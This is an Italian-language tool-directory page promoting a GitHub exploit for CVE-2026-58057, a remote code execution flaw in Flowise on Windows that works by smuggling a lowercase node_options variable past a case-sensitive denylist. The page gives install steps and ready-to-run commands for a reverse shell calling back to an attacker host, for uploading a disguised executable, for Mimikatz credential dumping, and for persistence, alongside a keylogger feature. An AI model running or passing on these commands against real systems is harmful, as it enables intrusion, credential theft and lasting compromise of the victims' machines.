Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Meccanismi di PersistenzaAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitPenetration TestingCommand and Control
Red Teaming
Sviluppo Payload
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Vedi Repository
1222 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Exploit RCE per Windows di Flowise per CVE-2026-58057. Bypassa la validazione delle variabili d'ambiente tramite una falla case-sensitive. Utilizza node_options per iniettare codice arbitrario tramite MCP stdio. Supporta reverse shell, persistenza, upload di file e credential dumping. Solo per test di sicurezza autorizzati.

Condividi

Flowise CVE-2026-58057 - Exploit di Esecuzione di Codice Remoto su Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 Panoramica

Questo è un exploit di livello produzione per CVE-2026-58057, una vulnerabilità critica di esecuzione di codice remoto in Flowise su piattaforme Windows. La vulnerabilità deriva dalla validazione delle variabili d'ambiente sensibile alle maiuscole che non riesce a bloccare node_options in minuscolo, consentendo agli aggressori di bypassare la denylist NODE_OPTIONS ed eseguire codice arbitrario tramite la configurazione Custom MCP stdio.

L'exploit dimostra pratiche professionali di ingegneria del software con architettura modulare, gestione completa degli errori e supporto per molteplici tipi di payload.

f1

f2

⚠️ Disclaimer

IMPORTANTE: Questo strumento è fornito esclusivamente per test di sicurezza autorizzati, test di penetrazione e scopi educativi.L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo software.Ottenere sempre la dovuta autorizzazione prima di testare qualsiasi sistema.

🔍 Dettagli Tecnici

Causa Radice della Vulnerabilità

# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Meccanismo dell'Exploit

  1. L'aggressore autentica su Flowise

  2. Crea/Modifica il nodo Custom MCP stdio

  3. Inietta la variabile d'ambiente node_options in minuscolo

  4. Imposta il valore su --require malicious-loader.js

  5. Node.js esegue il loader quando viene eseguito MCP stdio

  6. Viene ottenuta l'esecuzione di codice arbitrario

✨ Funzionalità

Capacità Principali

  • ✅ Reverse Shell - Connessione di ritorno alla macchina dell'aggressore

  • ✅ Bind Shell - Apre una porta in ascolto sul bersaglio

  • ✅ Command Execution - Esegue comandi di sistema arbitrari

  • ✅ File Upload - Carica file sul sistema bersaglio

  • ✅ Persistence - Molteplici meccanismi di persistenza

  • ✅ Information Gathering - Raccoglie informazioni sul sistema

  • ✅ Credential Dumping - Integrazione con Mimikatz

  • ✅ Screenshot Capture - Acquisisce screenshot del desktop

  • ✅ Keylogger - Installa funzionalità di keylogging

Caratteristiche Tecniche

  • 🔐 Molteplici Metodi di Autenticazione - API key o nome utente/password

  • 🔄 Logica di Riprova Automatica - Resiliente ai problemi di rete

  • 🧹 Auto-Pulizia - Rimuove i file loader dal bersaglio

  • 🌐 Multi-Piattaforma - Funziona su Windows/Linux/macOS

  • 🎨 Output Colorato - Leggibilità migliorata

  • 📊 Debug Dettagliato - Logging dettagliato per la risoluzione dei problemi

📦 Installazione

Prerequisiti

  • Python 3.6 o superiore

  • pip (gestore di pacchetti Python)

Installazione Rapida

# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Installazione Docker (Opzionale)

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Utilizzo

Opzioni della Riga di Comando

python3 exploit.py --help

Opzioni di Autenticazione

OpzioneDescrizioneEsempio
-t, --targetURL di Flowise (Obbligatorio)http://localhost:3000
-k, --api-keyAPI key di Flowiseflowise_abc123...
-u, --usernameNome utenteadmin
-p, --passwordPasswordpassword123

Opzioni del Payload

OpzioneDescrizioneEsempio
--payloadTipo di payloadreverse_shell
--lhostHost in ascolto192.168.1.100
--lportPorta in ascolto4444
--commandComando da eseguirewhoami
--local-fileFile da caricarepayload.exe
--remote-pathPercorso di salvataggio remotoC:\\Temp\\update.exe

Opzioni di Esecuzione

OpzioneDescrizione
--interactiveAvvia shell interattiva
--verboseAbilita output di debug
--timeoutTimeout della richiesta in secondi
--retriesNumero di tentativi di ripetizione

📝 Esempi di Utilizzo

1. Reverse Shell di Base

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell Interattivo

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Esecuzione di Comandi

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Caricamento File

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Estrazione Credenziali (Mimikatz)

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Installazione della Persistenza

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Raccolta di Informazioni

Scarica lo strumento